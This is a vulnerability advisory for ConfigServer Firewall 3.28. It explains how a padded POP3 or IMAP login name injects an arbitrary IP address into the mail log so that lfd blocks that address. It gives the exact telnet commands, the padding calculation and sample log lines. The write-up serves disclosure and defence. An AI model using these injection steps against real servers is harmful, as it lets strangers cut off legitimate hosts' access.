CSF 3.28 - remotely block any IP address (POP and IMAP regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute force login attempts on various services. regexps in csf/regexp.pm for the POP and IMAP services allowed any remote, unauthenticated person to block any IP address of their choice. The code looked similar to the following:

 36     if ( $line =~ /pop3d(-ssl)?: LOGIN FAILED.*ip=.*:(\d+\.\d+\.\d+\.\d+)/ ) {
 37         return ( 'Unsuccessful POP3 login from', $2, 'pop3d' );
 38     }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.


The following steps can be performed 10 times to take advantage of this issue:


1. telnet $victim_mailserver 110

2. issue the following 2 commands:

USER ANYTHINGip=:1.2.3.4
PASS a

where "ANYTHING" is (486 - 4 - length of the IP address string).



In the example above, "ANYTHING" would be 475 characters of whatever you want. The result will be that lfd calls iptables to block 1.2.3.4.


This also works on the IMAP regexp with some adjustments to the login string:

a001 LOGIN ANYTHINGip=:1.2.3.4


This is what a normal POP login failure from the maillog looks like:

Sep  8 17:39:31 host pop3d: LOGIN FAILED, user=alice, ip=[::ffff:1.1.1.1]

and this is what the log will look like when you issue the 2 commands from step 2 above:

Sep  8 17:38:03 host pop3d: LOGIN FAILED, user=AAA..(475 "A"s)..AAAAip=:1.2.3.4


What we've done is inject the IP address we want (1.2.3.4) at the very end of the log. You can verify this by using the same steps shown above, but for the "USER AAA..." line, replace "1.2.3.4" with "1.2.3.45". What you will see is the following log immediately after the "LOGIN FAILED" failed log:

Sep  8 17:57:04 host pop3d: 5, ip=[::ffff:1.1.1.1]

Note the "5" all by itself, which is the end of the "1.2.3.45" string.